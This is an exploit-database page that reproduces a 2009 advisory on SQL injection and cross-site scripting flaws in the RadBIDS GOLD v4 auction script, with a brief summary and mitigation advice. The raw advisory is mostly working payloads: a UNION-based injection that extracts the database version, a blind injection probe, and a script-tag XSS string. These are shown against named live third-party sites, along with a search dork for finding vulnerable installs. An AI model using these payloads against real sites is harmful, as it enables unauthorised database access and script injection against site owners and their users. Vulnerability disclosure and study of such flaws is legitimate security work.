header-logo
Suggest Exploit
vendor:
RadBIDS GOLD v4
by:
Moudi
8,8
CVSS
HIGH
SQL Injection and XSS
89, 79
CWE
Product Name: RadBIDS GOLD v4
Affected Version From: RadBIDS GOLD v4
Affected Version To: RadBIDS GOLD v4
Patch Exists: NO
Related CWE: N/A
CPE: a:radscripts:radbids_gold_v4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

RadBIDS GOLD v4 Multiple Remote Vulnerabilities

RadBIDS GOLD v4 is vulnerable to multiple remote vulnerabilities such as SQL Injection and XSS. An attacker can exploit these vulnerabilities to gain access to sensitive information such as user credentials, version information, etc. The vulnerability can be exploited by sending a specially crafted SQL query or XSS payload to the vulnerable application.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries. Also, ensure that all user input is properly encoded before being displayed on the web page.
Source

Exploit-DB raw data:

###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
        [»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
        [»] RadBIDS GOLD v4 Multiple Remote Vulnerabilities
==============================================================================

	[»] Script:             [ RadBIDS GOLD v4 ]
	[»] Language:           [ PHP ]
        [»] Download:           [ http://www.radscripts.com/auctionsoftware/ebay_style/index.html  ]
	[»] Founder:            [ Moudi <m0udi@9.cn> ]
        [»] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
        [»] Team:               [ EvilWay ]
        [»] Dork:               [ Powered by: RadBids Gold v4 ]
        [»] Price:              [ $199 ]
        [»] Site :              [ https://security-shell.ws/forum.php ]

###########################################################################

===[ Exploit + LIVE : SQL INJECTION vulnerability ]===	
	
[»] http://www.site.com/patch/index.php?a=view_forum&fid=[SQL]	

[»] http://www.radbids.com/auction_software/test/index.php?a=view_forum&fid=null+union+select+1,2,version(),4,5--&admin=0
[»] http://havetosellitnow.com/index.php?a=view_forum&fid=null+union+select+1,2,version(),4,5--&admin=0
    RESULT : 5.0.67-community 

===[ Exploit + LIVE : BLIND SQL vulnerability ]===

[»] http://www.site.com/patch/index.php?a=view_forum&fid=[BLIND]

[»] http://www.radbids.com/auction_software/test/index.php?a=view_forum&fid=1%20AND%20SUBSTRING(@@version,1,1)=5&admin=0 TRUE
    http://www.radbids.com/auction_software/test/index.php?a=view_forum&fid=1%20AND%20SUBSTRING(@@version,1,1)=4&admin=0 FALSE
    SO MYSQL: V5

===[ Exploit XSS + LIVE : vulnerability ]===

[»] http://www.site.com/patch/storefront.php?user=104&mode=[XSS]

[»] http://www.radbids.com/auction_software/test/storefront.php?user=104&mode=1>"><ScRiPt %0A%0D>alert(528305396116)%3B</ScRiPt>
[»] http://www.getmebids.com/storefront.php?user=104&mode=1>"><ScRiPt %0A%0D>alert(528305396116)%3B</ScRiPt>


Author: Moudi

###########################################################################

# milw0rm.com [2009-07-17]

Navigation

Suggest Exploit

Services By CQR